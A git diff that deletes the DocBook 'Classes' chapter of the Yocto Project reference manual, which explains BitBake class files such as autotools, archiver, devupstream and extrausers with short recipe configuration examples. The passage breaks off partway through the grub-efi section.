diff --git a/documentation/ref-manual/ref-classes.xml b/documentation/ref-manual/ref-classes.xml
deleted file mode 100644
index f9bbddd724..0000000000
--- a/documentation/ref-manual/ref-classes.xml
+++ /dev/null
@@ -1,3893 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-classes'>
-<title>Classes</title>
-
-<para>
- Class files are used to abstract common functionality and share it amongst
- multiple recipe (<filename>.bb</filename>) files.
- To use a class file, you simply make sure the recipe inherits the class.
- In most cases, when a recipe inherits a class it is enough to enable its
- features.
- There are cases, however, where in the recipe you might need to set
- variables or override some default behavior.
-</para>
-
-<para>
- Any <link linkend='metadata'>Metadata</link> usually
- found in a recipe can also be placed in a class file.
- Class files are identified by the extension <filename>.bbclass</filename>
- and are usually placed in a <filename>classes/</filename> directory beneath
- the <filename>meta*/</filename> directory found in the
- <link linkend='source-directory'>Source Directory</link>.
- Class files can also be pointed to by
- <link linkend='var-BUILDDIR'><filename>BUILDDIR</filename></link>
- (e.g. <filename>build/</filename>) in the same way as
- <filename>.conf</filename> files in the <filename>conf</filename> directory.
- Class files are searched for in
- <link linkend='var-BBPATH'><filename>BBPATH</filename></link>
- using the same method by which <filename>.conf</filename> files are
- searched.
-</para>
-
-<para>
- This chapter discusses only the most useful and important classes.
- Other classes do exist within the <filename>meta/classes</filename>
- directory in the Source Directory.
- You can reference the <filename>.bbclass</filename> files directly
- for more information.
-</para>
-
-<section id='ref-classes-allarch'>
- <title><filename>allarch.bbclass</filename></title>
-
- <para>
- The <filename>allarch</filename> class is inherited
- by recipes that do not produce architecture-specific output.
- The class disables functionality that is normally needed for recipes
- that produce executable binaries (such as building the cross-compiler
- and a C library as pre-requisites, and splitting out of debug symbols
- during packaging).
- <note>
- <para>Unlike some distro recipes (e.g. Debian), OpenEmbedded recipes
- that produce packages that depend on tunings through use of the
- <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>
- and
- <link linkend='var-TUNE_PKGARCH'><filename>TUNE_PKGARCH</filename></link>
- variables, should never be configured for all architectures
- using <filename>allarch</filename>.
- This is the case even if the recipes do not produce
- architecture-specific output.</para>
- <para>Configuring such recipes for all architectures causes the
- <link linkend='ref-tasks-package_write_deb'><filename>do_package_write_*</filename></link>
- tasks to have different signatures for the machines with different
- tunings.
- Additionally, unnecessary rebuilds occur every time an
- image for a different <filename>MACHINE</filename> is built
- even when the recipe never changes.</para>
- </note>
- </para>
-
- <para>
- By default, all recipes inherit the
- <link linkend='ref-classes-base'><filename>base</filename></link> and
- <link linkend='ref-classes-package'><filename>package</filename></link>
- classes, which enable functionality
- needed for recipes that produce executable output.
- If your recipe, for example, only produces packages that contain
- configuration files, media files, or scripts (e.g. Python and Perl),
- then it should inherit the <filename>allarch</filename> class.
- </para>
-</section>
-
-<section id='ref-classes-archiver'>
- <title><filename>archiver.bbclass</filename></title>
-
- <para>
- The <filename>archiver</filename> class supports releasing
- source code and other materials with the binaries.
- </para>
-
- <para>
- For more details on the source archiver, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-open-source-license-compliance-during-your-products-lifecycle'>Maintaining Open Source License Compliance During Your Product's Lifecycle</ulink>"
- section in the Yocto Project Development Tasks Manual.
- You can also see the
- <link linkend='var-ARCHIVER_MODE'><filename>ARCHIVER_MODE</filename></link>
- variable for information about the variable flags (varflags)
- that help control archive creation.
- </para>
-</section>
-
-<section id='ref-classes-autotools'>
- <title><filename>autotools*.bbclass</filename></title>
-
- <para>
- The <filename>autotools*</filename> classes support Autotooled
- packages.
- </para>
-
- <para>
- The <filename>autoconf</filename>, <filename>automake</filename>,
- and <filename>libtool</filename> packages bring standardization.
- This class defines a set of tasks (e.g.
- <filename>configure</filename>, <filename>compile</filename> and
- so forth) that
- work for all Autotooled packages.
- It should usually be enough to define a few standard variables
- and then simply <filename>inherit autotools</filename>.
- These classes can also work with software that emulates Autotools.
- For more information, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#new-recipe-autotooled-package'>Autotooled Package</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
-
- <para>
- By default, the <filename>autotools*</filename> classes
- use out-of-tree builds (i.e.
- <filename>autotools.bbclass</filename> building with
- <filename>B != S</filename>).
- </para>
-
- <para>
- If the software being built by a recipe does not support
- using out-of-tree builds, you should have the recipe inherit the
- <filename>autotools-brokensep</filename> class.
- The <filename>autotools-brokensep</filename> class behaves the same
- as the <filename>autotools</filename> class but builds with
- <link linkend='var-B'><filename>B</filename></link> ==
- <link linkend='var-S'><filename>S</filename></link>.
- This method is useful when out-of-tree build support is either not
- present or is broken.
- <note>
- It is recommended that out-of-tree support be fixed and used
- if at all possible.
- </note>
- </para>
-
- <para>
- It's useful to have some idea of how the tasks defined by
- the <filename>autotools*</filename> classes work and what they do
- behind the scenes.
- <itemizedlist>
- <listitem><para><link linkend='ref-tasks-configure'><filename>do_configure</filename></link> -
- Regenerates the
- configure script (using <filename>autoreconf</filename>) and
- then launches it with a standard set of arguments used during
- cross-compilation.
- You can pass additional parameters to
- <filename>configure</filename> through the
- <filename><link linkend='var-EXTRA_OECONF'>EXTRA_OECONF</link></filename>
- or
- <link linkend='var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></link>
- variables.
- </para></listitem>
- <listitem><para><link linkend='ref-tasks-compile'><filename>do_compile</filename></link> -
- Runs <filename>make</filename> with arguments that specify the
- compiler and linker.
- You can pass additional arguments through
- the <filename><link linkend='var-EXTRA_OEMAKE'>EXTRA_OEMAKE</link></filename>
- variable.
- </para></listitem>
- <listitem><para><link linkend='ref-tasks-install'><filename>do_install</filename></link> -
- Runs <filename>make install</filename> and passes in
- <filename>${</filename><link linkend='var-D'><filename>D</filename></link><filename>}</filename>
- as <filename>DESTDIR</filename>.
- </para></listitem>
- </itemizedlist>
- </para>
-</section>
-
-<section id='ref-classes-base'>
- <title><filename>base.bbclass</filename></title>
-
- <para>
- The <filename>base</filename> class is special in that every
- <filename>.bb</filename> file implicitly inherits the class.
- This class contains definitions for standard basic
- tasks such as fetching, unpacking, configuring (empty by default),
- compiling (runs any <filename>Makefile</filename> present), installing
- (empty by default) and packaging (empty by default).
- These classes are often overridden or extended by other classes
- such as the
- <link linkend='ref-classes-autotools'><filename>autotools</filename></link>
- class or the
- <link linkend='ref-classes-package'><filename>package</filename></link>
- class.
- </para>
-
- <para>
- The class also contains some commonly used functions such as
- <filename>oe_runmake</filename>, which runs
- <filename>make</filename> with the arguments specified in
- <link linkend='var-EXTRA_OEMAKE'><filename>EXTRA_OEMAKE</filename></link>
- variable as well as the arguments passed directly to
- <filename>oe_runmake</filename>.
- </para>
-</section>
-
-<section id='ref-classes-bash-completion'>
- <title><filename>bash-completion.bbclass</filename></title>
-
- <para>
- Sets up packaging and dependencies appropriate for recipes that
- build software that includes bash-completion data.
- </para>
-</section>
-
-<section id='ref-classes-bin-package'>
- <title><filename>bin_package.bbclass</filename></title>
-
- <para>
- The <filename>bin_package</filename> class is a
- helper class for recipes that extract the contents of a binary package
- (e.g. an RPM) and install those contents rather than building the
- binary from source.
- The binary package is extracted and new packages in the configured
- output package format are created.
- Extraction and installation of proprietary binaries is a good example
- use for this class.
- <note>
- For RPMs and other packages that do not contain a subdirectory,
- you should specify an appropriate fetcher parameter to point to
- the subdirectory.
- For example, if BitBake is using the Git fetcher
- (<filename>git://</filename>), the "subpath" parameter limits
- the checkout to a specific subpath of the tree.
- Here is an example where <filename>${BP}</filename> is used so that
- the files are extracted into the subdirectory expected by the
- default value of
- <link linkend='var-S'><filename>S</filename></link>:
- <literallayout class='monospaced'>
- SRC_URI = "git://example.com/downloads/somepackage.rpm;subpath=${BP}"
- </literallayout>
- See the
- "<ulink url='&YOCTO_DOCS_BB_URL;#bb-fetchers'>Fetchers</ulink>"
- section in the BitBake User Manual for more information on
- supported BitBake Fetchers.
- </note>
- </para>
-</section>
-
-<section id='ref-classes-binconfig'>
- <title><filename>binconfig.bbclass</filename></title>
-
- <para>
- The <filename>binconfig</filename> class helps to correct paths in
- shell scripts.
- </para>
-
- <para>
- Before <filename>pkg-config</filename> had become widespread, libraries
- shipped shell scripts to give information about the libraries and
- include paths needed to build software (usually named
- <filename>LIBNAME-config</filename>).
- This class assists any recipe using such scripts.
- </para>
-
- <para>
- During staging, the OpenEmbedded build system installs such scripts
- into the <filename>sysroots/</filename> directory.
- Inheriting this class results in all paths in these scripts being
- changed to point into the <filename>sysroots/</filename> directory so
- that all builds that use the script use the correct directories
- for the cross compiling layout.
- See the
- <link linkend='var-BINCONFIG_GLOB'><filename>BINCONFIG_GLOB</filename></link>
- variable for more information.
- </para>
-</section>
-
-<section id='ref-classes-binconfig-disabled'>
- <title><filename>binconfig-disabled.bbclass</filename></title>
-
- <para>
- An alternative version of the
- <link linkend='ref-classes-binconfig'><filename>binconfig</filename></link>
- class, which disables binary configuration scripts by making them
- return an error in favor of using <filename>pkg-config</filename>
- to query the information.
- The scripts to be disabled should be specified using the
- <link linkend='var-BINCONFIG'><filename>BINCONFIG</filename></link>
- variable within the recipe inheriting the class.
- </para>
-</section>
-
-<section id='ref-classes-blacklist'>
- <title><filename>blacklist.bbclass</filename></title>
-
- <para>
- The <filename>blacklist</filename> class prevents
- the OpenEmbedded build system from building specific recipes
- (blacklists them).
- To use this class, inherit the class globally and set
- <link linkend='var-PNBLACKLIST'><filename>PNBLACKLIST</filename></link>
- for each recipe you wish to blacklist.
- Specify the <link linkend='var-PN'><filename>PN</filename></link>
- value as a variable flag (varflag) and provide a reason, which is
- reported, if the package is requested to be built as the value.
- For example, if you want to blacklist a recipe called "exoticware",
- you add the following to your <filename>local.conf</filename>
- or distribution configuration:
- <literallayout class='monospaced'>
- INHERIT += "blacklist"
- PNBLACKLIST[exoticware] = "Not supported by our organization."
- </literallayout>
- </para>
-</section>
-
-<section id='ref-classes-buildhistory'>
- <title><filename>buildhistory.bbclass</filename></title>
-
- <para>
- The <filename>buildhistory</filename> class records a
- history of build output metadata, which can be used to detect possible
- regressions as well as used for analysis of the build output.
- For more information on using Build History, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-build-output-quality'>Maintaining Build Output Quality</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
-</section>
-
-<section id='ref-classes-buildstats'>
- <title><filename>buildstats.bbclass</filename></title>
-
- <para>
- The <filename>buildstats</filename> class records
- performance statistics about each task executed during the build
- (e.g. elapsed time, CPU usage, and I/O usage).
- </para>
-
- <para>
- When you use this class, the output goes into the
- <link linkend='var-BUILDSTATS_BASE'><filename>BUILDSTATS_BASE</filename></link>
- directory, which defaults to <filename>${TMPDIR}/buildstats/</filename>.
- You can analyze the elapsed time using
- <filename>scripts/pybootchartgui/pybootchartgui.py</filename>, which
- produces a cascading chart of the entire build process and can be
- useful for highlighting bottlenecks.
- </para>
-
- <para>
- Collecting build statistics is enabled by default through the
- <link linkend='var-USER_CLASSES'><filename>USER_CLASSES</filename></link>
- variable from your <filename>local.conf</filename> file.
- Consequently, you do not have to do anything to enable the class.
- However, if you want to disable the class, simply remove "buildstats"
- from the <filename>USER_CLASSES</filename> list.
- </para>
-</section>
-
-<section id='ref-classes-buildstats-summary'>
- <title><filename>buildstats-summary.bbclass</filename></title>
-
- <para>
- When inherited globally, prints statistics at the end of the build
- on sstate re-use.
- In order to function, this class requires the
- <link linkend='ref-classes-buildstats'><filename>buildstats</filename></link>
- class be enabled.
- </para>
-</section>
-
-<section id='ref-classes-ccache'>
- <title><filename>ccache.bbclass</filename></title>
-
- <para>
- The <filename>ccache</filename> class enables the C/C++ Compiler Cache
- for the build.
- This class is used to give a minor performance boost during the build.
- However, using the class can lead to unexpected side-effects.
- Thus, it is recommended that you do not use this class.
- See <ulink url='http://ccache.samba.org/'></ulink> for information on
- the C/C++ Compiler Cache.
- </para>
-</section>
-
-<section id='ref-classes-chrpath'>
- <title><filename>chrpath.bbclass</filename></title>
-
- <para>
- The <filename>chrpath</filename> class
- is a wrapper around the "chrpath" utility, which is used during the
- build process for <filename>nativesdk</filename>,
- <filename>cross</filename>, and
- <filename>cross-canadian</filename> recipes to change
- <filename>RPATH</filename> records within binaries in order to make
- them relocatable.
- </para>
-</section>
-
-<section id='ref-classes-clutter'>
- <title><filename>clutter.bbclass</filename></title>
-
- <para>
- The <filename>clutter</filename> class consolidates the
- major and minor version naming and other common items used by Clutter
- and related recipes.
- <note>
- Unlike some other classes related to specific libraries, recipes
- building other software that uses Clutter do not need to
- inherit this class unless they use the same recipe versioning
- scheme that the Clutter and related recipes do.
- </note>
- </para>
-</section>
-
-<section id='ref-classes-cmake'>
- <title><filename>cmake.bbclass</filename></title>
-
- <para>
- The <filename>cmake</filename> class allows for recipes that need to
- build software using the
- <ulink url='https://cmake.org/overview/'>CMake</ulink> build system.
- You can use the
- <link linkend='var-EXTRA_OECMAKE'><filename>EXTRA_OECMAKE</filename></link>
- variable to specify additional configuration options to be passed
- using the <filename>cmake</filename> command line.
- </para>
-
- <para>
- On the occasion that you would be installing custom CMake toolchain
- files supplied by the application being built, you should install them
- to the preferred CMake Module directory:
- <filename>${D}${datadir}/cmake/</filename> Modules during
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>.
- </para>
-</section>
-
-<section id='ref-classes-cml1'>
- <title><filename>cml1.bbclass</filename></title>
-
- <para>
- The <filename>cml1</filename> class provides basic support for the
- Linux kernel style build configuration system.
- </para>
-</section>
-
-<section id='ref-classes-compress_doc'>
- <title><filename>compress_doc.bbclass</filename></title>
-
- <para>
- Enables compression for man pages and info pages.
- This class is intended to be inherited globally.
- The default compression mechanism is gz (gzip) but you can
- select an alternative mechanism by setting the
- <link linkend='var-DOC_COMPRESS'><filename>DOC_COMPRESS</filename></link>
- variable.
- </para>
-</section>
-
-<section id='ref-classes-copyleft_compliance'>
- <title><filename>copyleft_compliance.bbclass</filename></title>
-
- <para>
- The <filename>copyleft_compliance</filename> class
- preserves source code for the purposes of license compliance.
- This class is an alternative to the <filename>archiver</filename>
- class and is still used by some users even though it has been
- deprecated in favor of the
- <link linkend='ref-classes-archiver'><filename>archiver</filename></link>
- class.
- </para>
-</section>
-
-<section id='ref-classes-copyleft_filter'>
- <title><filename>copyleft_filter.bbclass</filename></title>
-
- <para>
- A class used by the
- <link linkend='ref-classes-archiver'><filename>archiver</filename></link>
- and
- <link linkend='ref-classes-copyleft_compliance'><filename>copyleft_compliance</filename></link>
- classes for filtering licenses.
- The <filename>copyleft_filter</filename> class is an internal class
- and is not intended to be used directly.
- </para>
-</section>
-
-<section id='ref-classes-core-image'>
- <title><filename>core-image.bbclass</filename></title>
-
- <para>
- The <filename>core-image</filename> class
- provides common definitions for the
- <filename>core-image-*</filename> image recipes, such as support for
- additional
- <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>.
- </para>
-</section>
-
-<section id='ref-classes-cpan'>
- <title><filename>cpan*.bbclass</filename></title>
-
- <para>
- The <filename>cpan*</filename> classes support Perl modules.
- </para>
-
- <para>
- Recipes for Perl modules are simple.
- These recipes usually only need to point to the source's archive and
- then inherit the proper class file.
- Building is split into two methods depending on which method the module
- authors used.
- <itemizedlist>
- <listitem><para>Modules that use old
- <filename>Makefile.PL</filename>-based build system require
- <filename>cpan.bbclass</filename> in their recipes.
- </para></listitem>
- <listitem><para>Modules that use
- <filename>Build.PL</filename>-based build system require
- using <filename>cpan_build.bbclass</filename> in their recipes.
- </para></listitem>
- </itemizedlist>
- Both build methods inherit the <filename>cpan-base</filename> class
- for basic Perl support.
- </para>
-</section>
-
-<section id='ref-classes-cross'>
- <title><filename>cross.bbclass</filename></title>
-
- <para>
- The <filename>cross</filename> class provides support for the recipes
- that build the cross-compilation tools.
- </para>
-</section>
-
-<section id='ref-classes-cross-canadian'>
- <title><filename>cross-canadian.bbclass</filename></title>
-
- <para>
- The <filename>cross-canadian</filename> class
- provides support for the recipes that build the Canadian
- Cross-compilation tools for SDKs.
- See the
- "<ulink url='&YOCTO_DOCS_OM_URL;#cross-development-toolchain-generation'>Cross-Development Toolchain Generation</ulink>"
- section in the Yocto Project Overview and Concepts Manual for more
- discussion on these cross-compilation tools.
- </para>
-</section>
-
-<section id='ref-classes-crosssdk'>
- <title><filename>crosssdk.bbclass</filename></title>
-
- <para>
- The <filename>crosssdk</filename> class
- provides support for the recipes that build the cross-compilation
- tools used for building SDKs.
- See the
- "<ulink url='&YOCTO_DOCS_OM_URL;#cross-development-toolchain-generation'>Cross-Development Toolchain Generation</ulink>"
- section in the Yocto Project Overview and Concepts Manual for more
- discussion on these cross-compilation tools.
- </para>
-</section>
-
-<section id='ref-classes-debian'>
- <title><filename>debian.bbclass</filename></title>
-
- <para>
- The <filename>debian</filename> class renames output packages so that
- they follow the Debian naming policy (i.e. <filename>glibc</filename>
- becomes <filename>libc6</filename> and <filename>glibc-devel</filename>
- becomes <filename>libc6-dev</filename>.)
- Renaming includes the library name and version as part of the package
- name.
- </para>
-
- <para>
- If a recipe creates packages for multiple libraries
- (shared object files of <filename>.so</filename> type), use the
- <link linkend='var-LEAD_SONAME'><filename>LEAD_SONAME</filename></link>
- variable in the recipe to specify the library on which to apply the
- naming scheme.
- </para>
-</section>
-
-<section id='ref-classes-deploy'>
- <title><filename>deploy.bbclass</filename></title>
-
- <para>
- The <filename>deploy</filename> class handles deploying files
- to the
- <link linkend='var-DEPLOY_DIR_IMAGE'><filename>DEPLOY_DIR_IMAGE</filename></link>
- directory.
- The main function of this class is to allow the deploy step to be
- accelerated by shared state.
- Recipes that inherit this class should define their own
- <link linkend='ref-tasks-deploy'><filename>do_deploy</filename></link>
- function to copy the files to be deployed to
- <link linkend='var-DEPLOYDIR'><filename>DEPLOYDIR</filename></link>,
- and use <filename>addtask</filename> to add the task at the appropriate
- place, which is usually after
- <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>
- or
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>.
- The class then takes care of staging the files from
- <filename>DEPLOYDIR</filename> to
- <filename>DEPLOY_DIR_IMAGE</filename>.
- </para>
-</section>
-
-<section id='ref-classes-devshell'>
- <title><filename>devshell.bbclass</filename></title>
-
- <para>
- The <filename>devshell</filename> class adds the
- <filename>do_devshell</filename> task.
- Distribution policy dictates whether to include this class.
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#platdev-appdev-devshell'>Using a Development Shell</ulink>" section
- in the Yocto Project Development Tasks Manual for more information about
- using <filename>devshell</filename>.
- </para>
-</section>
-
-<section id='ref-classes-devupstream'>
- <title><filename>devupstream.bbclass</filename></title>
-
- <para>
- The <filename>devupstream</filename> class uses
- <link linkend='var-BBCLASSEXTEND'><filename>BBCLASSEXTEND</filename></link>
- to add a variant of the recipe that fetches from an alternative URI
- (e.g. Git) instead of a tarball.
- Following is an example:
- <literallayout class='monospaced'>
- BBCLASSEXTEND = "devupstream:target"
- SRC_URI_class-devupstream = "git://git.example.com/example"
- SRCREV_class-devupstream = "abcd1234"
- </literallayout>
- Adding the above statements to your recipe creates a variant that has
- <link linkend='var-DEFAULT_PREFERENCE'><filename>DEFAULT_PREFERENCE</filename></link>
- set to "-1".
- Consequently, you need to select the variant of the recipe to use it.
- Any development-specific adjustments can be done by using the
- <filename>class-devupstream</filename> override.
- Here is an example:
- <literallayout class='monospaced'>
- DEPENDS_append_class-devupstream = " gperf-native"
-
- do_configure_prepend_class-devupstream() {
- touch ${S}/README
- }
- </literallayout>
- The class currently only supports creating a development variant of
- the target recipe, not <filename>native</filename> or
- <filename>nativesdk</filename> variants.
- </para>
-
- <para>
- The <filename>BBCLASSEXTEND</filename> syntax
- (i.e. <filename>devupstream:target</filename>) provides support for
- <filename>native</filename> and <filename>nativesdk</filename>
- variants.
- Consequently, this functionality can be added in a future release.
- </para>
-
- <para>
- Support for other version control systems such as Subversion is
- limited due to BitBake's automatic fetch dependencies (e.g.
- <filename>subversion-native</filename>).
- </para>
-</section>
-
-<section id='ref-classes-distro_features_check'>
- <title><filename>distro_features_check.bbclass</filename></title>
-
- <para>
- The <filename>distro_features_check</filename> class
- allows individual recipes to check for required and conflicting
- <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>.
- </para>
-
- <para>
- This class provides support for the
- <link linkend='var-REQUIRED_DISTRO_FEATURES'><filename>REQUIRED_DISTRO_FEATURES</filename></link>
- and
- <link linkend='var-CONFLICT_DISTRO_FEATURES'><filename>CONFLICT_DISTRO_FEATURES</filename></link>
- variables.
- If any conditions specified in the recipe using the above variables are
- not met, the recipe will be skipped.
- </para>
-</section>
-
-<section id='ref-classes-distutils'>
- <title><filename>distutils*.bbclass</filename></title>
-
- <para>
- The <filename>distutils*</filename> classes support recipes for Python
- version 2.x extensions, which are simple.
- These recipes usually only need to point to the source's archive and
- then inherit the proper class.
- Building is split into two methods depending on which method the
- module authors used.
- <itemizedlist>
- <listitem><para>Extensions that use an Autotools-based build system
- require Autotools and the classes based on
- <filename>distutils</filename> in their recipes.
- </para></listitem>
- <listitem><para>Extensions that use build systems based on
- <filename>distutils</filename> require
- the <filename>distutils</filename> class in their recipes.
- </para></listitem>
- <listitem><para>Extensions that use build systems based on
- <filename>setuptools</filename> require the
- <link linkend='ref-classes-setuptools'><filename>setuptools</filename></link>
- class in their recipes.
- </para></listitem>
- </itemizedlist>
- The <filename>distutils-common-base</filename> class is required by
- some of the <filename>distutils*</filename> classes to provide common
- Python2 support.
- </para>
-</section>
-
-<section id='ref-classes-distutils3'>
- <title><filename>distutils3*.bbclass</filename></title>
-
- <para>
- The <filename>distutils3*</filename> classes support recipes for Python
- version 3.x extensions, which are simple.
- These recipes usually only need to point to the source's archive and
- then inherit the proper class.
- Building is split into three methods depending on which method the
- module authors used.
- <itemizedlist>
- <listitem><para>Extensions that use an Autotools-based build system
- require Autotools and
- <filename>distutils</filename>-based classes in their recipes.
- </para></listitem>
- <listitem><para>Extensions that use
- <filename>distutils</filename>-based build systems require
- the <filename>distutils</filename> class in their recipes.
- </para></listitem>
- <listitem><para>Extensions that use build systems based on
- <filename>setuptools3</filename> require the
- <link linkend='ref-classes-setuptools'><filename>setuptools3</filename></link>
- class in their recipes.
- </para></listitem>
- </itemizedlist>
- The <filename>distutils3*</filename> classes either inherit their
- corresponding <filename>distutils*</filename> class or replicate them
- using a Python3 version instead (e.g.
- <filename>distutils3-base</filename> inherits
- <filename>distutils-common-base</filename>, which is the same as
- <filename>distutils-base</filename> but inherits
- <filename>python3native</filename> instead of
- <filename>pythonnative</filename>).
- </para>
-</section>
-
-<section id='ref-classes-externalsrc'>
- <title><filename>externalsrc.bbclass</filename></title>
-
- <para>
- The <filename>externalsrc</filename> class supports building software
- from source code that is external to the OpenEmbedded build system.
- Building software from an external source tree means that the build
- system's normal fetch, unpack, and patch process is not used.
- </para>
-
- <para>
- By default, the OpenEmbedded build system uses the
- <link linkend='var-S'><filename>S</filename></link> and
- <link linkend='var-B'><filename>B</filename></link> variables to
- locate unpacked recipe source code and to build it, respectively.
- When your recipe inherits the <filename>externalsrc</filename> class,
- you use the
- <link linkend='var-EXTERNALSRC'><filename>EXTERNALSRC</filename></link>
- and
- <link linkend='var-EXTERNALSRC_BUILD'><filename>EXTERNALSRC_BUILD</filename></link>
- variables to ultimately define <filename>S</filename> and
- <filename>B</filename>.
- </para>
-
- <para>
- By default, this class expects the source code to support recipe builds
- that use the <link linkend='var-B'><filename>B</filename></link>
- variable to point to the directory in which the OpenEmbedded build
- system places the generated objects built from the recipes.
- By default, the <filename>B</filename> directory is set to the
- following, which is separate from the source directory
- (<filename>S</filename>):
- <literallayout class='monospaced'>
- ${WORKDIR}/${BPN}/{PV}/
- </literallayout>
- See these variables for more information:
- <link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>,
- <link linkend='var-BPN'><filename>BPN</filename></link>, and
- <link linkend='var-PV'><filename>PV</filename></link>,
- </para>
-
- <para>
- For more information on the
- <filename>externalsrc</filename> class, see the comments in
- <filename>meta/classes/externalsrc.bbclass</filename> in the
- <link linkend='source-directory'>Source Directory</link>.
- For information on how to use the <filename>externalsrc</filename>
- class, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#building-software-from-an-external-source'>Building Software from an External Source</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
-</section>
-
-<section id='ref-classes-extrausers'>
- <title><filename>extrausers.bbclass</filename></title>
-
- <para>
- The <filename>extrausers</filename> class allows
- additional user and group configuration to be applied at the image
- level.
- Inheriting this class either globally or from an image recipe allows
- additional user and group operations to be performed using the
- <link linkend='var-EXTRA_USERS_PARAMS'><filename>EXTRA_USERS_PARAMS</filename></link>
- variable.
- <note>
- The user and group operations added using the
- <filename>extrausers</filename> class are not tied to a specific
- recipe outside of the recipe for the image.
- Thus, the operations can be performed across the image as a whole.
- Use the
- <link linkend='ref-classes-useradd'><filename>useradd</filename></link>
- class to add user and group configuration to a specific recipe.
- </note>
- Here is an example that uses this class in an image recipe:
- <literallayout class='monospaced'>
- inherit extrausers
- EXTRA_USERS_PARAMS = "\
- useradd -p '' tester; \
- groupadd developers; \
- userdel nobody; \
- groupdel -g video; \
- groupmod -g 1020 developers; \
- usermod -s /bin/sh tester; \
- "
- </literallayout>
- Here is an example that adds two users named "tester-jim" and
- "tester-sue" and assigns passwords:
- <literallayout class='monospaced'>
- inherit extrausers
- EXTRA_USERS_PARAMS = "\
- useradd -P tester01 tester-jim; \
- useradd -P tester01 tester-sue; \
- "
- </literallayout>
- Finally, here is an example that sets the root password to
- "1876*18":
- <literallayout class='monospaced'>
- inherit extrausers
- EXTRA_USERS_PARAMS = "\
- usermod -P 1876*18 root; \
- "
- </literallayout>
- </para>
-</section>
-
-<section id='ref-classes-fontcache'>
- <title><filename>fontcache.bbclass</filename></title>
-
- <para>
- The <filename>fontcache</filename> class generates the
- proper post-install and post-remove (postinst and postrm)
- scriptlets for font packages.
- These scriptlets call <filename>fc-cache</filename> (part of
- <filename>Fontconfig</filename>) to add the fonts to the font
- information cache.
- Since the cache files are architecture-specific,
- <filename>fc-cache</filename> runs using QEMU if the postinst
- scriptlets need to be run on the build host during image creation.
- </para>
-
- <para>
- If the fonts being installed are in packages other than the main
- package, set
- <link linkend='var-FONT_PACKAGES'><filename>FONT_PACKAGES</filename></link>
- to specify the packages containing the fonts.
- </para>
-</section>
-
-<section id='ref-classes-fs-uuid'>
- <title><filename>fs-uuid.bbclass</filename></title>
-
- <para>
- The <filename>fs-uuid</filename> class extracts UUID from
- <filename>${</filename><link linkend='var-ROOTFS'><filename>ROOTFS</filename></link><filename>}</filename>,
- which must have been built by the time that this function gets called.
- The <filename>fs-uuid</filename> class only works on
- <filename>ext</filename> file systems and depends on
- <filename>tune2fs</filename>.
- </para>
-</section>
-
-<section id='ref-classes-gconf'>
- <title><filename>gconf.bbclass</filename></title>
-
- <para>
- The <filename>gconf</filename> class provides common
- functionality for recipes that need to install GConf schemas.
- The schemas will be put into a separate package
- (<filename>${</filename><link linkend='var-PN'><filename>PN</filename></link><filename>}-gconf</filename>)
- that is created automatically when this class is inherited.
- This package uses the appropriate post-install and post-remove
- (postinst/postrm) scriptlets to register and unregister the schemas
- in the target image.
- </para>
-</section>
-
-<section id='ref-classes-gettext'>
- <title><filename>gettext.bbclass</filename></title>
-
- <para>
- The <filename>gettext</filename> class provides support for
- building software that uses the GNU <filename>gettext</filename>
- internationalization and localization system.
- All recipes building software that use
- <filename>gettext</filename> should inherit this class.
- </para>
-</section>
-
-<section id='ref-classes-gnomebase'>
- <title><filename>gnomebase.bbclass</filename></title>
-
- <para>
- The <filename>gnomebase</filename> class is the base
- class for recipes that build software from the GNOME stack.
- This class sets
- <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link> to
- download the source from the GNOME mirrors as well as extending
- <link linkend='var-FILES'><filename>FILES</filename></link>
- with the typical GNOME installation paths.
- </para>
-</section>
-
-<section id='ref-classes-gobject-introspection'>
- <title><filename>gobject-introspection.bbclass</filename></title>
-
- <para>
- Provides support for recipes building software that
- supports GObject introspection.
- This functionality is only enabled if the
- "gobject-introspection-data" feature is in
- <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
- as well as "qemu-usermode" being in
- <link linkend='var-MACHINE_FEATURES'><filename>MACHINE_FEATURES</filename></link>.
- <note>
- This functionality is backfilled by default and,
- if not applicable, should be disabled through
- <link linkend='var-DISTRO_FEATURES_BACKFILL_CONSIDERED'><filename>DISTRO_FEATURES_BACKFILL_CONSIDERED</filename></link>
- or
- <link linkend='var-MACHINE_FEATURES_BACKFILL_CONSIDERED'><filename>MACHINE_FEATURES_BACKFILL_CONSIDERED</filename></link>,
- respectively.
- </note>
- </para>
-</section>
-
-<section id='ref-classes-grub-efi'>
- <title><filename>grub-efi.bbclass</filename></title>
-
- <para>
- The <filename>grub-efi</filename>
- class provides <filename>grub-efi</filename>-specific functions for
- building bootable images.
- </para>
-
- <para>
- This class supports several variables:
- <itemizedlist>
- <listitem><para>
- <link linkend='var-INITRD'><filename>INITRD</filename></link>:
- Indicates list of filesystem images to concatenate and use
- as an initial RAM disk (initrd) (optional).
- </para></listitem>
- <listitem><para>
- <link linkend='var-ROOTFS'><filename>ROOTFS</filename></link>:
- Indicates a filesystem image to include as the root filesystem
- (optional).</para></listitem>
- <listitem><para>
- <link linkend='var-GRUB_GFXSERIAL'><filename>GRUB_GFXSERIAL</filename></link>:
- Set this to "1" to have graphics and serial in the boot menu.
- </para></listitem>
- <listitem><para>
